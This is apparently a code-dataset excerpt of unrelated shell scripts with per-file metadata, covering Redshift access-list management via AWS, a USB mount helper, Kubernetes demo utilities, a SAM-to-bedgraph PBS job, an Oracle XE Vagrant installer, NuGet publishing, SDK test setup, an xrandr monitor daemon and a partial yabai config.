psql "host=$hostName port=$portNo dbname=$dbName user=$redshiftUserName password=$redshiftPassword" -a -w -e -f $sqlQueryFile
}
getSSMParameters(){
# Load notification email addresses from SSM into globals:
# fromEmail, toMail, leadsMailList, devopsMailList.
echo "Pulling parameters from SSM for $profile environment"
fromEmail=`aws ssm get-parameter --name /a2i/${profile}/ses/fromemail --profile ${profile} --with-decryption --query Parameter.Value --output text`
toMail=`aws ssm get-parameter --name /a2i/${profile}/ses/toAllList --profile ${profile} --with-decryption --query Parameter.Value --output text`
leadsMailList=`aws ssm get-parameter --name /a2i/${profile}/ses/leadsMailList --profile ${profile} --with-decryption --query Parameter.Value --output text`
devopsMailList=`aws ssm get-parameter --name /a2i/${profile}/ses/devopsMailList --profile ${profile} --with-decryption --query Parameter.Value --output text`
}
#######################################################################
######################### Feature Function Code #######################
#######################################################################
setInputParameters(){
# In 'auto' mode the access list comes from S3 (fetch currently commented
# out); otherwise $executionMode is presumably "local@<dbClient>" and the
# part after '@' overrides the global dbClient — confirm the format.
# NOTE(review): $executionMode is never assigned in this file; it must come
# from the caller's environment.
if [[ $executionMode == 'auto' ]]; then
echo 'Execution mode is auto'
# aws s3 cp s3://a2i-devops-${env}/redshift/axiom/accessList.txt ./tmpAccessList.txt --profile $profile
else
echo 'Execution mode is local so setting dbClient'
dbClient=`echo $executionMode | cut -d '@' -f2`
echo "dbClient is set to $dbClient"
fi
}
fetchAccessListFromS3(){
# Pull the client's current access list from S3 into ./tmpAccessList.txt.
aws s3 cp s3://a2i-devops-${env}/redshift/${dbClient}/accessList.txt ./tmpAccessList.txt --profile $profile
}
setAccessListInS3(){
# Sort the (possibly modified) access list in place and push it back to S3.
echo 'Sorting file'
sort -o tmpAccessList.txt tmpAccessList.txt
echo 'Pushing file to s3'
aws s3 cp ./tmpAccessList.txt s3://a2i-devops-${env}/redshift/${dbClient}/accessList.txt --profile $profile
}
grantAccess(){
# Apply the updated access list by running the companion access.sh script
# (expected to live next to this script) in 'auto' mode.
echo '#################################################################'
echo '##### I am done with correcting access file - Executing it #####'
echo '#################################################################'
./access.sh 'auto' ${dbClient} ${env}
}
fetchSchemaListFromSSM(){
# Dump the client's schema list from SSM into ./tmpSchemaList.txt.
echo "Fetching schema list from SSM for $dbClient db in $profile env"
aws ssm get-parameter --name "/a2i/$profile/redshift/${dbClient}/schema" --with-decryption --profile $profile --output text --query Parameter.Value > tmpSchemaList.txt
}
getCurrentAccessStatus(){
# Split the fetched access list into one scratch file per access level for
# $batchUser (consumed by the set*Access functions below).
# NOTE(review): grep -i "$batchUser READ" also matches READWRITE lines
# ("READ" is a prefix of "READWRITE") — confirm downstream logic tolerates
# the overlap.
echo "Checking current READ access status for $batchUser"
grep -i "$batchUser READ" tmpAccessList.txt > tmpREADAccessStatus.txt
echo "Checking current READWRITE access status for $batchUser"
grep -i "$batchUser READWRITE" tmpAccessList.txt > tmpREADWRITEAccessStatus.txt
echo "Checking current MASTER access status for $batchUser"
grep -i "$batchUser MASTER" tmpAccessList.txt > tmpMASTERAccessStatus.txt
}
# Dispatch to the handler for the requested access level.
# Anything other than MASTER/READWRITE falls through to READ.
checkAccessStatus(){
case "$accessLevel" in
MASTER)
echo 'Request access level is MASTER'
setMASTERAccess
;;
READWRITE)
echo 'Request access level is READWRITE'
setREADWRITEAccess
;;
*)
echo 'Request access level is READ'
setREADAccess
;;
esac
}
setMASTERAccess(){
# Ensure every schema in $schemaNames appears on the batch user's MASTER
# line: collect schemas with no existing entry, then either append a new
# MASTER line to tmpAccessList.txt or extend the existing one in place.
masterAccessList=''
oldMasterAccessList=$(cat tmpMASTERAccessStatus.txt | tr -d '\n')
# echo "old list is $oldMasterAccessList"
for schemaName in $(echo $schemaNames | sed "s/,/ /g")
do
if [[ $schemaName == '' ]]; then
echo 'No schemaName is provided as argument - Will break this execution'
else
echo "Working on $schemaName"
tmpMaster=$(grep -i "$schemaName" tmpMASTERAccessStatus.txt | wc -l | tr -d ' ')
# echo "tmpMaster is $tmpMaster"
if [[ $tmpMaster -gt 0 ]]; then
echo "Master entry already exists for $schemaName"
else
echo "Master entry does not exists for $schemaName - creating the same"
if [[ $masterAccessList == '' ]]; then
if [[ $oldMasterAccessList == '' ]]; then
masterAccessList="mstr_${batchUser} MASTER ${schemaName}"
else
masterAccessList="$(cat tmpMASTERAccessStatus.txt), $schemaName"
fi
else
masterAccessList="$masterAccessList, $schemaName"
fi
fi
fi
done
echo "old list is $oldMasterAccessList"
echo "Final master access list is $masterAccessList"
echo "Appending this list to tmp file"
# echo "$masterAccessList" >> tmpMASTERAccessStatus.txt
if [[ $masterAccessList == '' ]]; then
echo 'No new entries to modify - Master entries already qualified'
elif [[ $oldMasterAccessList == '' ]]; then
echo "$masterAccessList" >> tmpAccessList.txt
else
# fixed: was editing 'tmpAccessListtest.txt' (nonexistent file typo), so
# the extended MASTER line never reached the real access list.
sed -i -e "s|${oldMasterAccessList}|${masterAccessList}|g" tmpAccessList.txt
fi
}
setREADWRITEAccess(){
# Ensure every schema in $schemaNames has READWRITE (or better: MASTER)
# coverage for the batch user; append or extend the READWRITE line in
# tmpAccessList.txt accordingly.
readWriteAccessList=''
oldReadWriteAccessList=$(cat tmpREADWRITEAccessStatus.txt | tr -d '\n')
# echo "old list is $oldMasterAccessList"
for schemaName in $(echo $schemaNames | sed "s/,/ /g")
do
if [[ $schemaName == '' ]]; then
echo 'No schemaName is provided as argument - Will break this execution'
else
echo "Working on $schemaName"
tmpReadWrite=$(grep -i "$schemaName" tmpREADWRITEAccessStatus.txt | wc -l | tr -d ' ')
tmpMaster=$(grep -i "$schemaName" tmpMASTERAccessStatus.txt | wc -l | tr -d ' ')
# echo "tmpReadWrite is $tmpReadWrite"
# echo "tmpMaster is $tmpMaster"
if [[ ($tmpReadWrite -gt 0) || ($tmpMaster -gt 0) ]]; then
echo "ReadWrite entry already exists for $schemaName"
else
echo "ReadWrite entry does not exists for $schemaName - creating the same"
if [[ $readWriteAccessList == '' ]]; then
if [[ $oldReadWriteAccessList == '' ]]; then
readWriteAccessList="mstr_${batchUser} READWRITE ${schemaName}"
else
readWriteAccessList="$(cat tmpREADWRITEAccessStatus.txt), $schemaName"
fi
else
readWriteAccessList="$readWriteAccessList, $schemaName"
fi
fi
fi
done
echo "old list is $oldReadWriteAccessList"
echo "Final readwrite access list is $readWriteAccessList"
echo "Appending this list to tmp file"
# echo "$masterAccessList" >> tmpMASTERAccessStatus.txt
if [[ $readWriteAccessList == '' ]]; then
echo 'No new entries to modify - ReadWrite entries already qualified'
elif [[ $oldReadWriteAccessList == '' ]]; then
echo 'Creating new entries as READWRITE is empty'
echo "$readWriteAccessList" >> tmpAccessList.txt
else
echo 'Replacing READWRITE entries'
# fixed: 'sed -e' only printed to stdout and never modified the file;
# '-i' edits tmpAccessList.txt in place (matching setMASTERAccess).
sed -i -e "s|${oldReadWriteAccessList}|${readWriteAccessList}|g" tmpAccessList.txt
fi
}
setREADAccess(){
# Ensure every schema in $schemaNames has at least READ coverage (READ,
# READWRITE or MASTER all qualify); append or extend the READ line in
# tmpAccessList.txt accordingly.
readAccessList=''
oldReadAccessList=$(cat tmpREADAccessStatus.txt | tr -d '\n')
# echo "old list is $oldMasterAccessList"
for schemaName in $(echo $schemaNames | sed "s/,/ /g")
do
if [[ $schemaName == '' ]]; then
echo 'No schemaName is provided as argument - Will break this execution'
else
echo "Working on $schemaName"
tmpRead=$(grep -i "$schemaName" tmpREADAccessStatus.txt | wc -l | tr -d ' ')
tmpReadWrite=$(grep -i "$schemaName" tmpREADWRITEAccessStatus.txt | wc -l | tr -d ' ')
tmpMaster=$(grep -i "$schemaName" tmpMASTERAccessStatus.txt | wc -l | tr -d ' ')
echo "tmpRead is $tmpRead"
echo "tmpReadWrite is $tmpReadWrite"
echo "tmpMaster is $tmpMaster"
if [[ ($tmpReadWrite -gt 0) || ($tmpMaster -gt 0) || ($tmpRead -gt 0) ]]; then
echo "Read entry already exists for $schemaName"
else
echo "Read entry does not exists for $schemaName - creating the same"
if [[ $readAccessList == '' ]]; then
if [[ $oldReadAccessList == '' ]]; then
readAccessList="mstr_${batchUser} READ ${schemaName}"
else
readAccessList="$(cat tmpREADAccessStatus.txt), $schemaName"
fi
else
readAccessList="$readAccessList, $schemaName"
fi
fi
fi
done
echo "old list is $oldReadAccessList"
echo "Final read access list is $readAccessList"
echo "Appending this list to tmp file"
# echo "$masterAccessList" >> tmpMASTERAccessStatus.txt
if [[ $readAccessList == '' ]]; then
echo 'No new entries to modify - Read entries already qualified'
elif [[ $oldReadAccessList == '' ]]; then
echo 'Creating new entries as READ is empty'
echo "$readAccessList" >> tmpAccessList.txt
else
echo 'Replacing READ entries'
# fixed: 'sed -e' only printed to stdout and never modified the file;
# '-i' edits tmpAccessList.txt in place (matching setMASTERAccess).
sed -i -e "s|${oldReadAccessList}|${readAccessList}|g" tmpAccessList.txt
fi
}
sendNotifications(){
# Email devops that the access list was modified, via SES.
# NOTE(review): the 'from' address is hard-coded (not $fromEmail from
# getSSMParameters), and the CLI profile is always 'prod' regardless of
# $env — confirm both are intentional.
getSSMParameters
aws ses send-email \
--from "a2isupport@axiomtelecom.com" \
--destination "ToAddresses=$devopsMailList","CcAddresses=yogesh.patil@axiomtelecom.com" \
--message "Subject={Data=${env} | ${dbClient} | A2i Access Modification Notification ,Charset=utf8},Body={Text={Data=Testing Body,Charset=utf8},Html={Data=Hi All\,<br><br>This is to notify you all that access has been modified in <b>$env</b> environment for <b>$dbClient</b> db for <b>${schemaNames//,/\,} </b> schemas.<br>Batch user <b>$batchUser</b> is now having <b>${accessLevel} </b> on mentioned schemas.<br>Please reach out to devops in case of any issues.<br><br>Thanks and Regards\,<br>DevOps Team,Charset=utf8}}" \
--profile prod
}
#######################################################################
############################# Main Function ###########################
#######################################################################
# Pipeline: resolve env -> fetch credentials -> pull access list from S3 ->
# compute the requested entries -> push the list back -> apply grants ->
# notify devops.
echo "dbClient is $dbClient"
getProfile
getConnectionDetails
fetchAccessListFromS3
getCurrentAccessStatus
checkAccessStatus
setAccessListInS3
grantAccess
sendNotifications
#############################
########## CleanUp ##########
#############################
# NOTE(review): the removal below is commented out, so the tmp* scratch
# files are left behind after every run.
echo "Working on CleanUp"
# sudo rm -rf ./tmp*
| true
|
9c5fccbac35f34cd3b3c3748f8fca8fdadacb71f
|
Shell
|
micydog/javaexample
|
/linuxexmp/usbshell
|
UTF-8
| 342
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
# autousb: interactively mount /dev/sdb1 (FAT) on /mnt/usb, creating the
# mount point first if needed. Must run as root for mkdir/mount to succeed.
echo "welcome to use sutousb"
echo "do you want load usb(y/n)?"
# fixed: read -r avoids backslash mangling; quoting $ans below prevents a
# test error when the user just presses Enter.
read -r ans
if [ "$ans" = "Y" ] || [ "$ans" = "y" ]
then
  if [ -d "/mnt/usb" ]
  then
    mount -t vfat /dev/sdb1 /mnt/usb
  else
    mkdir /mnt/usb
    # fixed: original tested '[ $? qe 0 ]' — 'qe' is not an operator, so the
    # success branch never ran; the intended operator is -eq.
    if [ $? -eq 0 ]
    then
      echo "create /mnt/usb sucess"
      mount -t vfat /dev/sdb1 /mnt/usb
    fi
  fi
fi
| true
|
b5ebce1d9255d60f62d3502801caa40f9fe36a61
|
Shell
|
mjbright/christian-posta.kube-demos
|
/util.sh
|
UTF-8
| 2,527
| 3.953125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Shared helpers for the kube demo scripts: colored output, demo-style
# prompting, and helpers to run commands on the cluster node.
NS="demos"
# Terminal color escape sequences (bold + foreground color).
readonly color_reset=$(tput sgr0)
readonly red=$(tput bold; tput setaf 1)
readonly green=$(tput bold; tput setaf 2)
readonly yellow=$(tput bold; tput setaf 3)
readonly blue=$(tput bold; tput setaf 4)
readonly magenta=$(tput bold; tput setaf 5)
readonly cyan=$(tput bold; tput setaf 6)
# Print a fatal error (in red) plus a caller backtrace to stderr, then exit 1.
function die {
    echo "$0: ${red}die - $*${color_reset}" >&2
    # Walk up the call stack (at most 11 frames) and report each caller.
    local depth=0
    while [ $depth -le 10 ]; do
        local frame
        frame=$(caller $depth)
        [ -z "$frame" ] && break
        echo " Line: $frame" >&2
        depth=$((depth + 1))
    done
    exit 1
}
# Abort early unless the caller declared which environment node_run targets.
[ -z "$K8S_ENV" ] &&
die "Export K8S_ENV as either minishift/minikube/node/vagrant"
# wait_on_pods <POD_NAME>
#  - block until the named pod (in namespace $NS) reports Running.
# TODO: modify to wait on N/N containers
function wait_on_pods() {
    local POD_NAME=$1; shift

    echo "Waiting for $POD_NAME Pod to be in Running state"
    # BUG FIX: the original looped *while* the pod was Running, i.e. it only
    # returned once the pod STOPPED running — the inverse of the message
    # above. Loop until "Running" appears instead (quietly, via grep -q).
    until kubectl -n $NS get pods $POD_NAME --no-headers | grep -q Running; do echo "..."; sleep 1; done
    kubectl -n $NS get pods $POD_NAME
}
# node-run <COMMAND>
#  - Run a command on the master node, using whichever access method
#    matches $K8S_ENV (node = run locally; the others ssh into the VM).
function node_run() {
    local cmd="$*"
    case "$K8S_ENV" in
        # node: we're running directly on a cluster node:
        node)      eval "$cmd" ;;
        # TO TEST:
        # *: connect to node via vagrant/minishift/minikube as appropriate
        vagrant)   vagrant ssh master -- eval "$cmd" ;;
        minishift) minishift ssh -- eval "$cmd" ;;
        minikube)  minikube ssh -- eval "$cmd" ;;
        # TO implement:
        #pod) kubectl run node_run_pod --image alpine:latest --rm -it -- /bin/sh -c "eval '$*'";;
        *)         die "Not implemented K8S_ENV='$K8S_ENV'" ;;
    esac
}
# Print a blue "narration" line (like a shell comment) and show the prompt.
function desc() {
maybe_first_prompt
echo "$blue# $@$color_reset"
prompt
}
# Print the demo shell prompt ("$ " in yellow) without a trailing newline.
function prompt() {
    printf '%s%s%s' "$yellow" '$ ' "$color_reset"
}
# Tracks whether the first demo prompt has already been printed.
started=""
# Print the prompt exactly once, the first time any demo helper runs.
function maybe_first_prompt() {
    if [ -n "$started" ]; then
        return
    fi
    prompt
    started=true
}
# Reset the terminal screen between demo sections.
function backtotop() {
clear
}
# "Type" a command on screen (throttled via pv), execute it, then pause for
# the presenter unless DEMO_AUTO_RUN is set. Returns the command's status.
function run() {
maybe_first_prompt
# Characters-per-second for the simulated typing; DEMO_RUN_FAST speeds it up.
rate=25
if [ -n "$DEMO_RUN_FAST" ]; then
rate=1000
fi
echo "$green$1$color_reset" | pv -qL $rate
if [ -n "$DEMO_RUN_FAST" ]; then
sleep 0.5
fi
eval "$1"
r=$?
read -d '' -t 1 -n 10000 # clear stdin
prompt
# Wait for a (hidden) keypress before continuing, unless auto-running.
if [ -z "$DEMO_AUTO_RUN" ]; then
read -s
fi
return $r
}
# Echo each argument as a path next to this script, with the current
# working directory shortened to ".".
function relative() {
    local base here arg
    base=$(realpath $(dirname $(which $0)))
    here=$(realpath $(pwd))
    for arg in "$@"; do
        echo "$base/$arg" | sed "s|$here|.|"
    done
}
# First node name from kubectl's table output, used as the ssh target.
# NOTE(review): `tail -1 | cut -f1 -d' '` assumes default kubectl table
# formatting — confirm against the kubectl version in use.
SSH_NODE=$(kubectl get nodes | tail -1 | cut -f1 -d' ')
# Emit a final newline whenever the script exits.
trap "echo" EXIT
| true
|
ba961dccb99cc6adccb3aa812e2a485b8bafb13c
|
Shell
|
hochwagenlab/General_HiSeq_Functions
|
/Sam2Bedgraph.pbs
|
UTF-8
| 1,215
| 2.875
| 3
|
[] |
no_license
|
#!/bin/bash
#PBS -l nodes=1:ppn=1,walltime=3:00:00
#PBS -N Sam2Bedgraph
#PBS -M ${USER}@nyu.edu
#PBS -m abe
#PBS -o localhost:/scratch/${USER}/${PBS_JOBNAME}.o${PBS_JOBID}
#PBS -e localhost:/scratch/${USER}/${PBS_JOBNAME}.o${PBS_JOBID}
module load samtools/intel/1.2
module load bedtools/intel/2.23.0
# Purpose: to convert a folder of SAM files into bedgraphs
# In this example code, the first folder is assumed be only files mapped to SK1
# and the second folder is assumed to be only filed mapped to SacCer3
cd /scratch/tem298/sk1/
shopt -s nullglob # Avoid expanding to *.sam if there were no .sam files in directory
for f in *.sam
do
    # BUG FIX: 'samtools view -h' emits SAM (with header), not BAM, so the
    # downstream sort/index steps received SAM data in a .bam-named file.
    # Use -bS to actually convert SAM input to BAM output. Filenames are
    # quoted in case of spaces.
    samtools view -bS "$f" > "${f}.bam"
    samtools sort "$f.bam" "${f}.sorted"
    samtools index "$f.sorted.bam"
    samtools view -b "$f.sorted.bam" | genomeCoverageBed -ibam stdin -bg -g ~/Library/sk1_MvO_V1.chrLen.txt > "${f}.bedgraph"
done
cd ../S288C/
shopt -s nullglob # Avoid expanding to *.sam if there were no .sam files in directory
for g in *.sam
do
    # Same SAM->BAM fix as above.
    samtools view -bS "${g}" > "${g}.bam"
    samtools sort "${g}.bam" "${g}.sorted"
    samtools index "${g}.sorted.bam"
    samtools view -b "${g}.sorted.bam" | genomeCoverageBed -ibam stdin -bg -g ~/Library/S288C.chrLen.txt > "${g}.bedgraph"
done
exit 0;
| true
|
69ae2ea45cf392205a43fc8788645c38d1e8fff1
|
Shell
|
oracle/vagrant-projects
|
/OracleDatabase/18.4.0-XE/scripts/install.sh
|
UTF-8
| 4,403
| 3.375
| 3
|
[
"UPL-1.0",
"MIT",
"Ruby",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
#
# LICENSE UPL 1.0
#
# Copyright (c) 1982-2018 Oracle and/or its affiliates. All rights reserved.
#
# Since: July, 2018
# Author: gerald.venzl@oracle.com
# Description: Installs Oracle database software
#
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.
#
# Abort on any error
set -e
echo 'INSTALLER: Started up'
# get up to date
yum upgrade -y
echo 'INSTALLER: System updated'
# fix locale warning
yum reinstall -y glibc-common
echo LANG=en_US.utf-8 >> /etc/environment
echo LC_ALL=en_US.utf-8 >> /etc/environment
echo 'INSTALLER: Locale set'
# set system time zone
# NOTE(review): SYSTEM_TIMEZONE, LISTENER_PORT, EM_EXPRESS_PORT and
# ORACLE_CHARACTERSET are expected from the provisioning environment —
# confirm they are exported before this script runs.
sudo timedatectl set-timezone $SYSTEM_TIMEZONE
echo "INSTALLER: System time zone set to $SYSTEM_TIMEZONE"
# Install Oracle Database prereq and openssl packages
# (preinstall is pulled automatically with 18c XE rpm, but it
# doesn't create /home/oracle unless it's installed separately)
yum install -y oracle-database-preinstall-18c openssl
echo 'INSTALLER: Oracle preinstall and openssl complete'
# set environment variables
echo "export ORACLE_BASE=/opt/oracle" >> /home/oracle/.bashrc
echo "export ORACLE_HOME=/opt/oracle/product/18c/dbhomeXE" >> /home/oracle/.bashrc
echo "export ORACLE_SID=XE" >> /home/oracle/.bashrc
echo "export PATH=\$PATH:\$ORACLE_HOME/bin" >> /home/oracle/.bashrc
echo 'INSTALLER: Environment variables set'
# Install Oracle
# if installer doesn't exist, download it
db_installer='oracle-database-xe-18c-1.0-1.x86_64.rpm'
if [[ ! -f /vagrant/"${db_installer}" ]]; then
echo 'INSTALLER: Downloading Oracle Database software'
(
cd /vagrant || exit 1
curl -L -O -s https://download.oracle.com/otn-pub/otn_software/db-express/"${db_installer}"
)
fi
yum -y localinstall /vagrant/"${db_installer}"
# ${KEEP_DB_INSTALLER,,} lower-cases the value (bash 4+), so "False"/"FALSE"
# also trigger removal of the downloaded rpm.
if [[ "${KEEP_DB_INSTALLER,,}" == 'false' ]]; then
rm -f /vagrant/"${db_installer}"
fi
echo 'INSTALLER: Oracle software installed'
# Auto generate ORACLE PWD if not passed on
export ORACLE_PWD=${ORACLE_PWD:-"`openssl rand -base64 8`1"}
# Create database
mv /etc/sysconfig/oracle-xe-18c.conf /etc/sysconfig/oracle-xe-18c.conf.original
cp /vagrant/ora-response/oracle-xe-18c.conf.tmpl /etc/sysconfig/oracle-xe-18c.conf
chmod g+w /etc/sysconfig/oracle-xe-18c.conf
# Fill the ###PLACEHOLDER### tokens in the config template.
sed -i -e "s|###LISTENER_PORT###|$LISTENER_PORT|g" /etc/sysconfig/oracle-xe-18c.conf
sed -i -e "s|###EM_EXPRESS_PORT###|$EM_EXPRESS_PORT|g" /etc/sysconfig/oracle-xe-18c.conf
sed -i -e "s|###ORACLE_CHARACTERSET###|$ORACLE_CHARACTERSET|g" /etc/sysconfig/oracle-xe-18c.conf
sed -i -e "s|###ORACLE_PWD###|$ORACLE_PWD|g" /etc/sysconfig/oracle-xe-18c.conf
su -l -c '/etc/init.d/oracle-xe-18c configure'
chmod o+r /opt/oracle/product/18c/dbhomeXE/network/admin/tnsnames.ora
# add tnsnames.ora entry for PDB
echo "XEPDB1 =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = $LISTENER_PORT))
(CONNECT_DATA =
(SERVER = DEDICATED)
(SERVICE_NAME = XEPDB1)
)
)
" >> /opt/oracle/product/18c/dbhomeXE/network/admin/tnsnames.ora
echo 'INSTALLER: Database created'
# enable global port for EM Express
su -l oracle -c 'sqlplus / as sysdba <<EOF
EXEC DBMS_XDB_CONFIG.SETGLOBALPORTENABLED (TRUE);
exit
EOF'
echo 'INSTALLER: Global EM Express port enabled'
# configure systemd to start oracle instance on startup
sudo systemctl daemon-reload
sudo systemctl enable oracle-xe-18c
sudo systemctl start oracle-xe-18c
echo "INSTALLER: Created and enabled oracle-xe-18c systemd's service"
sudo cp /vagrant/scripts/setPassword.sh /home/oracle/
sudo chown oracle:oinstall /home/oracle/setPassword.sh
sudo chmod u+x /home/oracle/setPassword.sh
echo "INSTALLER: setPassword.sh file setup";
# run user-defined post-setup scripts
echo 'INSTALLER: Running user-defined post-setup scripts'
# ${f,,} lower-cases the filename so .SH / .SQL extensions also match.
for f in /vagrant/userscripts/*
do
case "${f,,}" in
*.sh)
echo "INSTALLER: Running $f"
. "$f"
echo "INSTALLER: Done running $f"
;;
*.sql)
echo "INSTALLER: Running $f"
su -l oracle -c "echo 'exit' | sqlplus -s / as sysdba @\"$f\""
echo "INSTALLER: Done running $f"
;;
/vagrant/userscripts/put_custom_scripts_here.txt)
:
;;
*)
echo "INSTALLER: Ignoring $f"
;;
esac
done
echo 'INSTALLER: Done running user-defined post-setup scripts'
echo "ORACLE PASSWORD FOR SYS, SYSTEM AND PDBADMIN: $ORACLE_PWD";
echo "INSTALLER: Installation complete, database ready to use!";
| true
|
24cdf9ea38f4f62ccfbada3c5b87d08f76f30228
|
Shell
|
PlayFab/SDKGenerator
|
/SetupScripts/testInit.sh
|
UTF-8
| 1,685
| 3.75
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
# USAGE: testInit.sh
# Load shared helpers from the current directory, or (on Jenkins) from
# $WORKSPACE; source errors are deliberately suppressed as best-effort.
if [ -f "util.sh" ]; then
. "./util.sh" 2> /dev/null
. "./sdkUtil.sh" 2> /dev/null
elif [ ! -z "$WORKSPACE" ]; then
. "$WORKSPACE/SdkGenerator/SetupScripts/util.sh" 2> /dev/null
. "$WORKSPACE/SdkGenerator/SetupScripts/sdkUtil.sh" 2> /dev/null
fi
# Provided by the sourced helpers; validates verticalized build parameters.
CheckVerticalizedParameters
# Restore NuGet packages for JenkinsConsoleUtility.
# Returns 1 (doing nothing) when the nuget CLI is not installed.
DoJcuNugetUpdate () {
DoesCommandExist nuget || return 1
pushd "$WORKSPACE/SDKGenerator/JenkinsConsoleUtility"
nuget restore JenkinsConsoleUtility.sln
popd
}
# USAGE: ResetRepo
# Reset the repo in the current directory: sync master from origin, then
# recreate $GitDestBranch from it (unless the dest branch IS master).
ResetRepo () {
echo === ResetRepo $PWD, $@ ===
# Assumes the current directory is set to the repo to be reset
CheckCreds
git fetch --progress origin
git checkout master || git checkout -b master || CleanCurrentRepo
git pull origin master
# Delete $GitDestBranch, reset it to master, prep for next build and fresh write
# BUG FIX: the original wrote [ "$GitDestBranch"!="master" ] with no spaces
# around !=, which bash parses as a single non-empty string — always true,
# so the branch was rebuilt even when it WAS master. Proper comparison:
if [ "$GitDestBranch" != "master" ]; then
git branch -D $GitDestBranch || true
git checkout -b $GitDestBranch || true
git checkout $GitDestBranch
fi
}
# USAGE: DoWork
# Sync every repo the build needs (generator, target SDK, API specs, and the
# optional private-templates repo), then reset the SDK repo's dest branch.
DoWork () {
echo == DoWork $PWD, $@ ==
SyncGitHubRepo "$WORKSPACE" "SDKGenerator" "SDKGenerator" "$GitSdkGenBranch"
# Nuget restore failure is non-fatal — log and continue.
DoJcuNugetUpdate || echo "Failed to Nuget restore JenkinsConsoleUtility"
SyncGitHubRepo "$WORKSPACE/sdks" "$SdkName" "$SdkName" "$GitSdkDestBranch"
SyncGitHubRepo "$WORKSPACE" "API_Specs"
if [ ! -z "$SdkGenPrvTmplRepo" ]; then
SyncGitHubRepo "$WORKSPACE/SDKGenerator/privateTemplates" "$SdkGenPrvTmplRepo" "$SdkGenPrvTmplRepo" "$GitPrvTmplBranch"
fi
ForcePushD "$WORKSPACE/sdks/$SdkName"
ResetRepo
}
echo === Beginning testInit ===
# Forward all CLI arguments to the worker.
DoWork "$@"
| true
|
f04c245aa84c638fb7366d94803a9a60c0973761
|
Shell
|
kkysen/BashConfig
|
/functions/moveTo.sh
|
UTF-8
| 98
| 2.765625
| 3
|
[
"MIT"
] |
permissive
|
# moveTo <destination> <source>
# NOTE the reversed argument order versus plain `mv`: destination first.
# `--` protects against paths that begin with a dash.
moveTo() {
    mv -- "${2}" "${1}"
}
export -f moveTo

# mvTo — short alias for moveTo (same reversed argument order).
mvTo() {
    moveTo "${@}"
}
export -f mvTo
| true
|
4407ba3957fdfb65ac2e9a9d59c495bb3af04d58
|
Shell
|
serdarakis/PackagingChallenge
|
/Scripts/publish.sh
|
UTF-8
| 235
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
# Push every NuGet package under ../Packages/ to nuget.org.
# NOTE(review): <Api-Key> is a placeholder — prefer reading the key from an
# environment variable so it is never committed.
API_KEY="<Api-Key>"
FOLDER="../Packages/"
SOURCE="https://api.nuget.org/v3/index.json"
for entry in "$FOLDER"*
do
echo "$entry"
# --skip-duplicate makes re-runs idempotent for already-published versions.
dotnet nuget push "$entry" --api-key "$API_KEY" --source "$SOURCE" --skip-duplicate
done
| true
|
f81f0f47f763642385fda9be9af04e7bb1c9ea9b
|
Shell
|
sittim/configs
|
/.config/i3/xrandr_deamon.sh
|
UTF-8
| 753
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
# Handler fired when the xrandr output count grows.
# NOTE(review): this enables the laptop panel (eDP1) and turns DP1 off —
# confirm the connect/disconnect mapping matches the intended monitors.
onConnection() {
echo onConnection
xrandr --output eDP1 --auto
xrandr --output DP1 --off
}
# Handler fired when the xrandr output count shrinks: switch to DP1,
# turning the laptop panel (eDP1) off.
onDisconnection() {
echo onDisconnection
xrandr --output eDP1 --off
xrandr --output DP1 --auto
}
#########################
# Temp file holding the previous xrandr line count between events.
statefile="`mktemp`"
# Clean up the state file and abort when interrupted.
quit() {
rm "$statefile"
exit 1
}
trap quit SIGINT SIGTERM
# Capture the current xrandr output line count (a cheap "what is
# connected" fingerprint) into the global $state.
getstate() {
    state="$(xrandr -q | wc -l)"
}
# Persist the current $state value into $statefile (overwriting it).
savestate() {
    printf '%s\n' "$state" > "$statefile"
}
getstate
savestate
# Watch for RandR output-change events; on each one, compare the new xrandr
# line count to the saved value to decide connect vs. disconnect.
xev -root -event randr | grep --line-buffered XRROutputChangeNotifyEvent | \
while IFS= read -r line; do
getstate
old="`cat "$statefile"`"
# NOTE(review): "more lines" is treated as "display connected" — a
# heuristic that may misfire for other output changes; confirm it suits
# this machine's outputs.
if [ "$state" -gt "$old" ]; then
onConnection
elif [ "$state" -lt "$old" ]; then
onDisconnection
fi
savestate
done
| true
|
f2bfbf58f2ef2850a5ecec86dead371eba481cc9
|
Shell
|
cih9088/dotfiles
|
/config/yabai/yabairc
|
UTF-8
| 3,572
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
#
# the scripting-addition must be loaded manually if
# one is running yabai on macOS Big Sur.
# for this to work one must configure sudo such that
# it will be able to run the command without password
#
# see this wiki page for information:
# - https://github.com/koekeishiya/yabai/wiki/Installing-yabai-(latest-release)#configure-scripting-addition
#
# if OS version is greater than big sur,
big_sur_version=11.0
# Version compare: sort -V picks the smaller of (current, 11.0); if that is
# 11.0 the running OS is Big Sur or newer.
if [ "$(printf '%s\n' "$(sw_vers -productVersion)" "$big_sur_version" | sort -V | head -n 1)" = "$big_sur_version" ]; then
yabai -m signal --add event=dock_did_restart action="sudo yabai --load-sa"
sudo yabai --load-sa
fi
# global settings
yabai -m config mouse_follows_focus off
yabai -m config focus_follows_mouse off
yabai -m config window_placement second_child
yabai -m config window_topmost off
yabai -m config window_opacity off
yabai -m config active_window_opacity 1.0
yabai -m config normal_window_opacity 0.90
yabai -m config window_shadow float
yabai -m config window_border off
yabai -m config window_border_width 3
yabai -m config active_window_border_color 0xff775759
yabai -m config normal_window_border_color 0xff505050
yabai -m config insert_feedback_color 0xffd75f5f
yabai -m config split_ratio 0.50
yabai -m config auto_balance off
yabai -m config mouse_modifier fn
yabai -m config mouse_action1 move
yabai -m config mouse_action2 resize
yabai -m config mouse_drop_action swap
# NOTE(review): external_bar all:0:25 reserves bar space on every display —
# confirm the 25px offset matches the sketchybar height used below.
yabai -m config external_bar all:0:25
# general space settings
yabai -m config layout bsp
yabai -m config top_padding 10
yabai -m config bottom_padding 10
yabai -m config left_padding 10
yabai -m config right_padding 10
yabai -m config window_gap 10
# Rules
# NOTE(review): this blanket rule excludes ALL apps from management, which
# appears to override the tiling settings above for every window — confirm
# this "manage nothing" state is intentional.
